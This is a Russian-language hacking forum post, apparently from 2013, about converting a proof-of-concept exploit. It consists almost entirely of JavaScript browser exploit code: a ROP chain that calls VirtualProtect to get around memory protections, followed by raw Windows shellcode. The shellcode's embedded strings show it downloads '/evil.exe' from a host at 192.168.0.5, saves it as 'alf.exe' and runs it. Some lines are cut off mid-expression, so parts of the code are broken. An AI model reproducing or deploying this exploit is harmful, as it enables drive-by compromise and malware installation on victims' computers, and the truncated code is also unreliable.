Тема: преобразование PoC Exploit
Показать сообщение отдельно

  #3  
Старый 19.02.2013, 15:42
zero_day
Познающий
Регистрация: 09.11.2012
Сообщений: 56
Провел на форуме:
15008

Репутация: 0
По умолчанию
Код:
  

 
function strtoint(str) {
    return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
 
var free = "EEEE";
while ( free.length  Changed
    var rop = rop.toString(16);
    var rop11 = rop.substring(4,8);
    var rop12 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 5504544; // Writable location
    var rop = rop.toString(16);
    var writable1 = rop.substring(4,8);
    var writable2 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 12462; // POP EDI
    var rop = rop.toString(16);
    var rop13 = rop.substring(4,8);
    var rop14 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 12043; // POP ESI --> changed
    var rop = rop.toString(16);
    var rop15 = rop.substring(4,8);
    var rop16 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 63776; // JMP EAX
    var rop = rop.toString(16);
    var jmpeax1 = rop.substring(4,8);
    var jmpeax2 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 85751; // POP EAX
    var rop = rop.toString(16);
    var rop17 = rop.substring(4,8);
    var rop18 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 4936; // VirtualProtect()
    var rop = rop.toString(16);
    var vp1 = rop.substring(4,8);
    var vp2 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
    var rop = rop.toString(16);
    var rop19 = rop.substring(4,8);
    var rop20 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 234657; // PUSHAD
    var rop = rop.toString(16);
    var rop21 = rop.substring(4,8);
    var rop22 = rop.substring(0,4); // } RET
 
 
    var rop = cbuttonlayout + 408958; // PUSH ESP
    var rop = rop.toString(16);
    var rop23 = rop.substring(4,8);
    var rop24 = rop.substring(0,4); // } RET
 
    var shellcode = unescape("%u"+rop1+"%u"+rop2); // RET
    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
    shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP
    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
    shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
    shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
    shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
    shellcode+= unescape("%u0040%u0000"); // 0x00000040
    shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
    shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
    shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
    shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
    shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
    shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
    shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
    shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
    shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
    shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
    shellcode+= unescape("%u9090%u9090"); // crap
    shellcode+= unescape("%u9090%u9090"); // crap
 

    shellcode+= "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31"+
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52"+
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"+
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1"+
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52"+
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"+
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"+
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b"+
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"+
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b"+
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3"+
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"+
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"+
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"+
"\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"+
"\x77\x69\x6e\x69\x89\xe6\x54\x68\x4c\x77"+
"\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57"+
"\x56\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x63"+
"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68"+
"\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f"+
"\xc6\xff\xd5\xeb\x4f\x59\x31\xd2\x52\x68"+
"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50"+
"\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x6a"+
"\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"+
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86"+
"\xff\xd5\x31\xff\x57\x57\x57\x57\x56\x68"+
"\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1d"+
"\x4b\x0f\x84\x7a\x00\x00\x00\xeb\xd1\xe9"+
"\x89\x00\x00\x00\xe8\xac\xff\xff\xff\x2f"+
"\x65\x76\x69\x6c\x2e\x65\x78\x65\x00\xeb"+
"\x6b\x31\xc0\x5f\x50\x6a\x02\x6a\x02\x50"+
"\x6a\x02\x6a\x02\x57\x68\xda\xf6\xda\x4f"+
"\xff\xd5\x93\x31\xc0\x66\xb8\x04\x03\x29"+
"\xc4\x54\x8d\x4c\x24\x08\x31\xc0\xb4\x03"+
"\x50\x51\x56\x68\x12\x96\x89\xe2\xff\xd5"+
"\x85\xc0\x74\x2d\x58\x85\xc0\x74\x16\x6a"+
"\x00\x54\x50\x8d\x44\x24\x0c\x50\x53\x68"+
"\x2d\x57\xae\x5b\xff\xd5\x83\xec\x04\xeb"+
"\xce\x53\x68\xc6\x96\x87\x52\xff\xd5\x6a"+
"\x00\x57\x68\x31\x8b\x6f\x87\xff\xd5\x6a"+
"\x00\x68\xf0\xb5\xa2\x56\xff\xd5\xe8\x90"+
"\xff\xff\xff\x61\x6c\x66\x2e\x65\x78\x65"+
"\x00\xe8\x0a\xff\xff\xff\x31\x39\x32\x2e"+
"\x31\x36\x38\x2e\x30\x2e\x35\x00";
 
 
 
    while (shellcode.length
 
Ответить с цитированием